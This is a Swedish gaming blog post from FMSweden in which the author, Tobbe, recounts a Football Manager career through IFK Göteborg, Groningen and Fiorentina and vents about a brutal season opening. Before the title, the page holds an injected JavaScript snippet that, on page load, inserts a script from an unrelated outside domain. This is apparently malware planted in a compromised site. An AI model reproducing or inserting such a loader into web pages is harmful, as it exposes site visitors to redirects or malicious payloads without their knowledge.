;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); AW med Tobbe – Dra åt helvete!! – FMSweden
Meny Stäng

AW med Tobbe – Dra åt helvete!!

Hur många gånger har man hittat ett save, som man är så peppad på. Man kör några säsonger och det går jävligt bra.

Så plötsligt börjar man tröttna och väljer att dra vidare. Du har varit en sjukt bra manager i laget du började med, så du vill ändå ge ett nytt lag chansen.

Ofta kommer man in mitt i en säsong och gör det bra, det är när du ska lyfta och ta nästa steg, som det riktiga jävla pungslaget kommer. 

 

Jag har varit mitt uppe i ett save som började med att jag, Hecktor, Danne Nilsson och Werner, skulle ta över IFK Göteborg och spela en säsong. Det var för att kunna publiceras och se hur bra vi som “spelnördar” hade skött Blåvitt.

Vi hjälptes åt de första säsongerna och det gick sjukt bra. Pontus satte taktiken och spelsättet, Hecktor fyllde på med målande beskrivningar om att bygga ett lag. Danne scoutade spelare och styrde upp klubben, medan jag styrde skutan som manager och skötte laget i matcherna och spelade liksom.

Efter tre säsonger hade Blåvitt vunnit ett SM-guld och ett cupguld. Vi hade ett eget kapital på 250 miljoner och spelade i Europa igen.

Efter åtta säsonger var det dags att gå vidare. Danne skötte fortfarande scoutingen, men Werner och Hecktor hade fallit ifrån. Det var 1.2 miljarder på banken och en Europarankning som innebar att Blåvitt var topp-20 i Europa. Det kändes okay att lämna med fem SM-guld och en Champions League-kvartsfinal i bagaget.

Resan gick till FC Groningen, vi ( Danne och jag ) fick snabbt ordning på ekonomin. Efter två säsonger hade Groningen kommit fyra i ligan och varit i semifinal i Europa League. Tanken var att bygga samma struktur som i IFK Göteborg.

Då kom Fiorentina och knackade på dörren. La Viola, laget med lika mycket historik som mystik. Att bo i Florens var för bra för att tacka nej till.

Säsongen var 10 omgångar in och Fiorentina låg på 13:e plats. Nils Fröling var anfallsess och Federico Chiesa och Nikola Milenkovic fanns som rutinerade stjärnspelare.

Efter att Danne scoutat sönder vinterfönstret hade vi två-tre nyförvärv som skulle lyfta La Viola till en 6:e plats säsongen 2029/30. Allt var på väg åt rätt håll, karriären var i en rak linje snett uppåt.

Vi scoutade nyförvärv och byggde en trupp för att utmana storlagen inför säsongen 2030/31.

Starten på säsongen innebar matcher mot Roma(b), Milan(h), Juventus(b) och Inter(b). Dom kom i tur och ordning 3:a, 2:a, 4:a och 1:a året innan.

DRA ÅT HELVETE!!

Vill inte ens börja säsongen, vill inte börja en säsong som jag trodde på, som kan visa sig vara slut innan den började.

Jag ska givetvis ta mig an uppgiften, inte vika ner mig och inte ge upp innan det börjat.

MEN SPELET KAN FORTFARANDE DRA ÅT HELVETE

För att jag inte kan få 10 matcher med en mjukstart och hitta formen.

För att jag inte kan få spela ihop mitt lag och känna att jag är på G.

Jaja, vi får väl se hur det går. Skål på er kamrater och ha en grym helg.

Tobbe

Please wait...

Liknande Inlägg

2 kommentarer

Lämna ett svar